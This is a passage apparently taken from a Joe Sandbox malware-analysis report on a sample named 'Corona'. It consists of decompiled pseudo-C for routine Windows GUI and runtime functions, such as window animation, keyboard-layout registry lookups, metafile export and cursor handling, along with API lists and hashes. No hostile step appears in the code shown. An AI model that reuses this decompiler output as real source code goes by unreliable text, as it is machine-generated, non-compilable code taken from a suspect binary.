					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00439624( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x4509d0(E00434EF4(_v8), 0x64,  *0x00450AD8 | 0x00040000);
					}
				}
				_t80 =  *0x450fc8; // 0x452bb0
				E00432628(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
				ShowWindow(E00434EF4(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x4365b0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                                  0x004363de
                                  0x004363df
                                  0x004363e0
                                  0x004363e1
                                  0x004363e2
                                  0x004363e4
                                  0x004363e7
                                  0x004363f0
                                  0x004363f9
                                  0x004363fa
                                  0x004363ff
                                  0x00436402
                                  0x0043640a
                                  0x0043640f
                                  0x00436419
                                  0x00436430
                                  0x0043643f
                                  0x0043643f
                                  0x00436454
                                  0x00436463
                                  0x00436463
                                  0x00436470
                                  0x00436479
                                  0x00436479
                                  0x00436486
                                  0x0043648f
                                  0x0043648f
                                  0x004364b5
                                  0x004364cd
                                  0x004364f5
                                  0x004364fe
                                  0x0043650d
                                  0x00436516
                                  0x00436524
                                  0x0043652f
                                  0x0043652f
                                  0x0043652f
                                  0x00436553
                                  0x00436553
                                  0x004364fe
                                  0x00436559
                                  0x00436566
                                  0x00436576
                                  0x00436580
                                  0x00436585
                                  0x00436588
                                  0x0043658b
                                  0x00436598
                                  0x0043659e
                                  0x004365a1
                                  0x004365a8

                                  APIs
                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,004365A9), ref: 004364B5
                                  • GetTickCount.KERNEL32 ref: 004364BA
                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 004364F5
                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043650D
                                  • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00436553
                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,004365A9), ref: 00436576
                                    • Part of subcall function 00439624: GetCursorPos.USER32(?), ref: 00439628
                                  • GetTickCount.KERNEL32 ref: 00436590
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                  • String ID:
                                  • API String ID: 3024527889-0
                                  • Opcode ID: 732aa29df0398b49f3c5a7309c1541630a28d09799cab43b08c032486abff0c7
                                  • Instruction ID: 4f2be3ccbff9ddb3c6c74059a6a99b83a0e00959d40f7f3482999931b9d768cf
                                  • Opcode Fuzzy Hash: 732aa29df0398b49f3c5a7309c1541630a28d09799cab43b08c032486abff0c7
                                  • Instruction Fuzzy Hash: 95514C74A00209EFDB10EF99D986A9EB7F5EF48304F21856AE500E7255C779EE40CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044BA60, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E0044BA60(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x44bc0b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x44bc12);
					return E00403E4C( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E004030CC(1);
					E00403E4C(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00415288( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00439A94( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E004088B8( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x44bbc7);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E004040BC( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E004040BC(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x44bbce);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                  0x0044ba60
                                  0x0044ba61
                                  0x0044ba63
                                  0x0044ba6c
                                  0x0044ba72
                                  0x0044ba77
                                  0x0044ba78
                                  0x0044ba7d
                                  0x0044ba80
                                  0x0044ba8a
                                  0x0044bbec
                                  0x0044bbf4
                                  0x0044bbf7
                                  0x0044bbfa
                                  0x0044bc0a
                                  0x0044ba90
                                  0x0044ba9f
                                  0x0044baa8
                                  0x0044babb
                                  0x0044babe
                                  0x0044bbdb
                                  0x0044bbe1
                                  0x0044bbe7
                                  0x00000000
                                  0x0044bac4
                                  0x0044bac5
                                  0x0044bace
                                  0x0044bad1
                                  0x0044badd
                                  0x00000000
                                  0x0044bae3
                                  0x0044baf5
                                  0x0044bafb
                                  0x0044bb25
                                  0x00000000
                                  0x0044bb2b
                                  0x0044bb2d
                                  0x0044bb2e
                                  0x0044bb33
                                  0x0044bb36
                                  0x0044bb39
                                  0x0044bb5f
                                  0x0044bb72
                                  0x0044bb8a
                                  0x0044bb98
                                  0x0044bbab
                                  0x0044bbab
                                  0x0044bb98
                                  0x0044bbb2
                                  0x0044bbb5
                                  0x0044bbb8
                                  0x0044bbc6
                                  0x0044bbc6
                                  0x0044bb25
                                  0x00000000
                                  0x0044bbce
                                  0x0044bbce
                                  0x0044bbd2
                                  0x0044bbd2
                                  0x0044bbd2
                                  0x00000000
                                  0x0044bad1
                                  0x0044babe
                                  0x00000000

                                  APIs
                                  • GetKeyboardLayoutList.USER32(00000040,?,00000000,0044BC0B,?,02131320,?,0044BC6D,00000000,?,00430D2F), ref: 0044BAB6
                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0044BB1E
                                  • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0044BBC7,?,80000002,00000000), ref: 0044BB58
                                  • RegCloseKey.ADVAPI32(?,0044BBCE,00000000,?,00000100,00000000,0044BBC7,?,80000002,00000000), ref: 0044BBC1
                                  Strings
                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0044BB08
                                  • layout text, xrefs: 0044BB4F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                  • API String ID: 1703357764-2652665750
                                  • Opcode ID: c4617a68c53d41e3543ae32cdc4ad7d4888de782c04551970d85b6d74ee93a60
                                  • Instruction ID: 37df39ee0dc5cc2184b923404b0e7e3260e08d0ff74a2b9b0a7fd4d05cbf1091
                                  • Opcode Fuzzy Hash: c4617a68c53d41e3543ae32cdc4ad7d4888de782c04551970d85b6d74ee93a60
                                  • Instruction Fuzzy Hash: 36414C74A002099FEB11DF95C981B9EB7F8EF48304F5044AAE904A7791D778EE408FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00420034, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E00420034(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402B18( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E0041E40C( &_v38);
					_v18 = _t43;
					_push(0);
					L0040638C();
					_v16 = _t43;
					_push(_t83);
					_push(0x42016f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E004026BC(_v12);
					_push(_t83);
					_push(0x42014f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E0041D61C(_t67);
					}
					E0041559C(_t80, 0x16,  &_v38);
					E0041559C(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x420156);
					return E004026DC(_v8);
				}
			}






















                                  0x00420035
                                  0x00420037
                                  0x0042003c
                                  0x0042003e
                                  0x00420044
                                  0x0042017b
                                  0x0042004a
                                  0x00420054
                                  0x00420059
                                  0x0042005c
                                  0x00420063
                                  0x0042006a
                                  0x00420074
                                  0x0042006c
                                  0x0042006c
                                  0x0042006c
                                  0x0042008b
                                  0x004200a2
                                  0x004200a9
                                  0x004200ae
                                  0x004200b2
                                  0x004200b4
                                  0x004200b9
                                  0x004200be
                                  0x004200bf
                                  0x004200c4
                                  0x004200c7
                                  0x004200dd
                                  0x004200e8
                                  0x004200ed
                                  0x004200ee
                                  0x004200f3
                                  0x004200f6
                                  0x00420113
                                  0x00420115
                                  0x00420115
                                  0x00420124
                                  0x00420131
                                  0x00420138
                                  0x0042013b
                                  0x0042013e
                                  0x0042014e
                                  0x0042014e

                                  APIs
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 00420086
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 0042009D
                                  • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 004200B4
                                  • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0042016F,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004200D8
                                  • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0042014F,?,?,00000000,00000000,00000008,?,00000000,0042016F), ref: 0042010B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: BitsFileMeta
                                  • String ID: `
                                  • API String ID: 858000408-2679148245
                                  • Opcode ID: 023f2a71db7b25d756b1804989572081cf7ff648af4b7b628bd86fdea15984d1
                                  • Instruction ID: ca66e32d297c195c30ab6a3d4779e81325931c76c8928defe3e7d1a569e3355c
                                  • Opcode Fuzzy Hash: 023f2a71db7b25d756b1804989572081cf7ff648af4b7b628bd86fdea15984d1
                                  • Instruction Fuzzy Hash: F2316574A00208ABDB00DF95D881AFEB7F8EF49704F514466F904AB296D6399D50CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043C580, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E0043C580(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x452b98 == 0) {
					 *0x452b98 = E0040BA08("comctl32.dll", __eax);
					if( *0x452b98 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x452b9c = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E00419B90(_t43, 1, 0);
				_push(_t45);
				_push(0x43c67a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x452b9c == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E0043B4C8(_t28);
					_push(_t11);
					L0042372C();
					if(_t11 == 0) {
						_t33 =  *0x450eac; // 0x41a45c
						E0040B274(_t33, 1);
						E00403888();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E0043B4C8(_t28));
					if( *0x452b9c() != 0) {
						_t34 =  *0x450eac; // 0x41a45c
						E0040B274(_t34, 1);
						E00403888();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x43c681);
				return E004030FC(_v8);
			}
















                                  0x0043c581
                                  0x0043c584
                                  0x0043c587
                                  0x0043c589
                                  0x0043c592
                                  0x0043c59e
                                  0x0043c5ad
                                  0x0043c5b9
                                  0x0043c5bd
                                  0x0043c5ca
                                  0x0043c5ca
                                  0x0043c5bd
                                  0x0043c5ad
                                  0x0043c5df
                                  0x0043c5e4
                                  0x0043c5e5
                                  0x0043c5ea
                                  0x0043c5ed
                                  0x0043c5f7
                                  0x0043c631
                                  0x0043c636
                                  0x0043c638
                                  0x0043c638
                                  0x0043c63b
                                  0x0043c63e
                                  0x0043c643
                                  0x0043c644
                                  0x0043c64b
                                  0x0043c64d
                                  0x0043c65a
                                  0x0043c65f
                                  0x0043c65f
                                  0x0043c5f9
                                  0x0043c5f9
                                  0x0043c5fe
                                  0x0043c600
                                  0x0043c600
                                  0x0043c603
                                  0x0043c604
                                  0x0043c60d
                                  0x0043c616
                                  0x0043c618
                                  0x0043c625
                                  0x0043c62a
                                  0x0043c62a
                                  0x0043c616
                                  0x0043c666
                                  0x0043c669
                                  0x0043c66c
                                  0x0043c679

                                  APIs
                                    • Part of subcall function 0040BA08: 739414E0.VERSION(00000000,?,00000000,0040BADE), ref: 0040BA4A
                                    • Part of subcall function 0040BA08: 739414C0.VERSION(00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA7F
                                    • Part of subcall function 0040BA08: 73941500.VERSION(?,0040BAF0,?,?,00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA99
                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 0043C5B4
                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 0043C5C5
                                  • 73451DE0.COMCTL32(00000000,?,00000000,0043C67A), ref: 0043C644
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 739414$7345173941500AddressHandleModuleProc
                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                  • API String ID: 978676473-3125200627
                                  • Opcode ID: eb834de5698537f9b18cef4fc3382d38dddbd2bcb8729810cf576a2d9bfc5b91
                                  • Instruction ID: e9a318a36f5c64a228ff2c05a5c829af884a116d31c0a476508e0499b644eb5d
                                  • Opcode Fuzzy Hash: eb834de5698537f9b18cef4fc3382d38dddbd2bcb8729810cf576a2d9bfc5b91
                                  • Instruction Fuzzy Hash: 9721AE70600300ABDB10EF369D87B2A37A8DB59705F10A13BF805E72A2DB79ED408B5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423B80, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00423B80(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x452925 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00405FF4();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x45290c; // 0x423b80
					 *0x45290c = E0042377C(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x45290c(_t27, _t29);
				}
				return _t24;
			}














                                  0x00423b89
                                  0x00423b8c
                                  0x00423b96
                                  0x00423bbb
                                  0x00423bc3
                                  0x00423be3
                                  0x00423be8
                                  0x00423bf3
                                  0x00423bfe
                                  0x00423c08
                                  0x00423c09
                                  0x00423c0a
                                  0x00423c0b
                                  0x00423c0c
                                  0x00423c0d
                                  0x00423c17
                                  0x00423c19
                                  0x00423c21
                                  0x00423c22
                                  0x00423c22
                                  0x00423c27
                                  0x00423c27
                                  0x00423b98
                                  0x00423b9d
                                  0x00423baa
                                  0x00423bb7
                                  0x00423bb7
                                  0x00423c31

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423BD8
                                  • GetSystemMetrics.USER32 ref: 00423BED
                                  • GetSystemMetrics.USER32 ref: 00423BF8
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00423C22
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoA
                                  • API String ID: 2545840971-1370492664
                                  • Opcode ID: 6c3827def660ae31f0c5105d1d2decd2efbb0088633e3b186f1bc6ebbd155225
                                  • Instruction ID: 43870788231af9d03fcff2d7efea263e342a83579d947105252d570e007e8cee
                                  • Opcode Fuzzy Hash: 6c3827def660ae31f0c5105d1d2decd2efbb0088633e3b186f1bc6ebbd155225
                                  • Instruction Fuzzy Hash: E611E4727013159FD720CF62AC447A7B7F8EB0A712F40892BED45A7351D7B9A9408BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004206B8, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E004206B8(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E0041DE58(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L0040638C();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L0040603C();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x420767);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x42076e);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L004065C4();
						return _t31;
					}
				}
			}

















                                  0x004206b8
                                  0x004206b9
                                  0x004206bb
                                  0x004206c3
                                  0x004206c6
                                  0x004206ca
                                  0x0042076e
                                  0x00420773
                                  0x004206db
                                  0x004206e9
                                  0x004206ee
                                  0x004206f2
                                  0x00000000
                                  0x004206f4
                                  0x004206f4
                                  0x004206f6
                                  0x004206fb
                                  0x004206fe
                                  0x00420701
                                  0x00420702
                                  0x00420707
                                  0x00420714
                                  0x00420719
                                  0x0042071a
                                  0x0042071f
                                  0x00420722
                                  0x00420733
                                  0x0042073a
                                  0x0042073d
                                  0x00420740
                                  0x0042074d
                                  0x00420756
                                  0x0042075b
                                  0x0042075e
                                  0x0042075f
                                  0x00420761
                                  0x00420766
                                  0x00420766
                                  0x004206f2

                                  APIs
                                    • Part of subcall function 0041DE58: GetObjectA.GDI32(?,00000004), ref: 0041DE6F
                                    • Part of subcall function 0041DE58: 72E7AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,004206EE), ref: 0041DE92
                                  • 72E7AC50.USER32(00000000), ref: 004206F6
                                  • 72E7A590.GDI32(?,00000000), ref: 00420702
                                  • SelectObject.GDI32(?), ref: 0042070F
                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00420767,?,?,?,?,00000000), ref: 00420733
                                  • SelectObject.GDI32(?,?), ref: 0042074D
                                  • DeleteDC.GDI32(?), ref: 00420756
                                  • 72E7B380.USER32(00000000,?,?,?,?,0042076E,?,00000000,00420767,?,?,?,?,00000000), ref: 00420761
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590B380ColorDeleteTable
                                  • String ID:
                                  • API String ID: 980243606-0
                                  • Opcode ID: 293ab1f444f3af5487f18a5b7d9288eebc8dd0e8d6b2bd1ca266f63037e0c205
                                  • Instruction ID: a017874a5c4c1e7bd90330ea7e1f06b663e69c48fe53f10130404cce1f0c5833
                                  • Opcode Fuzzy Hash: 293ab1f444f3af5487f18a5b7d9288eebc8dd0e8d6b2bd1ca266f63037e0c205
                                  • Instruction Fuzzy Hash: CA115471E00318AFDB10EBE9DC51EAEB3FCEB48704F4144AAB505E7281D6799D508B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044BD10, Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0044BD10(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E0044BCE8(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004066FC(SendMessageA(_t27, 0x84, 0, E00406774(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                  0x0044bd10
                                  0x0044bd10
                                  0x0044bd14
                                  0x0044bd17
                                  0x0044bd19
                                  0x0044bd1f
                                  0x0044bd94
                                  0x0044bd94
                                  0x0044bd21
                                  0x0044bd21
                                  0x0044bd28
                                  0x0044bd84
                                  0x0044bd8f
                                  0x00000000
                                  0x0044bd2a
                                  0x0044bd2b
                                  0x0044bd30
                                  0x0044bd3d
                                  0x0044bd41
                                  0x00000000
                                  0x0044bd43
                                  0x0044bd46
                                  0x0044bd54
                                  0x00000000
                                  0x0044bd56
                                  0x0044bd7d
                                  0x0044bd7d
                                  0x0044bd54
                                  0x0044bd41
                                  0x0044bd28
                                  0x0044bd9d

                                  APIs
                                  • GetCursorPos.USER32 ref: 0044BD2B
                                  • WindowFromPoint.USER32(?,?), ref: 0044BD38
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0044BD46
                                  • GetCurrentThreadId.KERNEL32 ref: 0044BD4D
